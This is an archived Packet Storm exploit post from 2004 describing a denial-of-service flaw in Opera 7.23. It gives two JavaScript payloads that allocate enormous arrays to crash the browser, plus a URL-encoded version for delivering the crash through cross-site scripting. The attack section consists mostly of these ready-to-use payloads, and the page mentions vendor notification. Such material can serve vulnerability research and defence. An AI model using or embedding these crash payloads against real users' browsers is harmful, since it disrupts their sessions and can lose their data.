exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

opera723.txt

opera723.txt
Posted Mar 15, 2004
Authored by d3thstar | Site rootthief.com

Opera version 7.23 on Linux and Windows is susceptible to a denial of service attack.

tags | exploit, denial of service
systems | linux, windows
SHA-256 | f1b8be232303b141d1bda5a5d7fdd2031d5d44123151705e76ac664178c83549

opera723.txt

Change Mirror Download
Opera Array Allocation Managment Exploit
=====================================
Dicovered by- d3thStaR [!AM] <d3thStaR at rootthief.com>
Greets: !AM Crew, Atomix, d3thstar, mgrd, 0x29A Crew, rootthief.com.
Sources: Safari Overflow Exploit- kang
Confirmed products effected- Opera 7.23 Linux, Opera 7.23 Windows

=======Description of Problem=======
Someone could remotely seg-fault the Opera web-browser by creating an array allocation managment error.

<script>var a = new Array(99999999999999999999999); a[0+5]="AAAAA";</script>

<script>var bam = new Array(0x23000000); bam.sort(new Function("return 1"));</script>

Results in crashed client. No, severe, damage; did loose a 'Note' on one test.

=======Precautions=======
Be aware of cross-site scripting attacks.

Known URL triggers: %40%3cscript%3evar%20bam%20%3d%20new%20Array%280x2
3000000%29%3b%20bam%2esort%28new%20Function%28%22r
eturn%201%22%29%29%3b%3c%2fscript%3e

Vendor- Opera.com
Notified- 3/12/04_1:04am/Central

d3thStaR
<d3thStaR at rootthief.com>

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close